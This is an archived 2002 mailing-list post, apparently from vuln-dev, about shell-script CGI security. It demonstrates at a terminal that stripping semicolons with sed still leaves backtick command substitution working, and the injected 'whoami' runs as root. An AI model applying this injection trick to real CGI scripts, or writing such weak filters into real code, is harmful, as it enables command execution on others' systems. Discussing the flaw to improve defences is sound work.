Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting

Re: shell script cgi (summary?)

From: Brian Fury <brianfury(at)blueyonder.co.uk>
Date: Tue Nov 19 2002 - 01:40:28 EST

On Mon, 18 Nov 2002, you wrote:
> Thanks to everyone who replied regarding my attempts

Obviously I can't speak authoratively here... I mean the ueber-skilled team vuln-dev people who are payed to do this sort of thing may have top-secret zero-day reasons why this might not work.... but hey it worked for me.

[root@localhost lib]# export LAME=""whoami"""" [root@localhost lib]# `echo "$LAME" | sed "s#\;##g"` root
[root@localhost lib]#

wh00pz - lookz like command execution to me

In case you didn't realise - it'z the ` and ` characters around the whole expression that allowz uz command execution....

[root@localhost lib]# echo $LAME
whoami
[root@localhost lib]# `echo $LAME`
root
[root@localhost lib]#

BTW - it workz fine in a shell script.....

Do you need help?X

I'm sure somone has already mentioned this....

Best Regardz

Brian Fury

"You gonna feel the power of my move, you ready?" Received on Tue Nov 19 14:31:51 2002

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:37 EDT


Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library